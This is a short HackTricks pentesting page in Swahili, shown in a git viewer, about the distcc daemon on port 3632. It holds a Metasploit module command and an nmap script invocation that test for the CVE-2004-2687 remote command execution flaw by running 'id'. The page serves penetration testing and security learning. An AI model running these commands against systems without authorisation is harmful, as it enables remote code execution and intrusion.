hacktricks/network-services-pentesting/3632-pentesting-distcc.md

42 lines
2.3 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2024-02-11 02:13:58 +00:00
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
2022-04-28 16:01:33 +00:00
2024-02-11 02:13:58 +00:00
Njia nyingine za kusaidia HackTricks:
2022-04-28 16:01:33 +00:00
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
2022-04-28 16:01:33 +00:00
</details>
2024-02-11 02:13:58 +00:00
# Taarifa Msingi
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu za usindikaji zilizotulia** za kompyuta nyingine kwenye mtandao. Wakati **distcc** inapowekwa kwenye mashine, mashine hii inaweza kusambaza **kazi zake za uundaji** kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza **daemani ya distccd** na lazima awe na **kompaila inayoweza kufanya kazi** imewekwa ili iprocess nambari iliyotumwa.
**Bandari ya chaguo:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Utekaji
Angalia ikiwa ina hatari ya **CVE-2004-2687** ya kutekeleza nambari za aina yoyote:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
2022-05-01 12:49:36 +00:00
# Shodan
2020-10-05 10:16:52 +00:00
2024-02-11 02:13:58 +00:00
_Sidhani shodan inagundua huduma hii._
2020-10-05 10:16:52 +00:00
2024-02-11 02:13:58 +00:00
# Vyanzo
2021-11-30 16:46:07 +00:00
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
* [https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855](https://gist.github.com/DarkCoderSc/4dbf6229a93e75c3bdf6b467e67a9855)
Mchapishaji: **Álex B (@r1p)**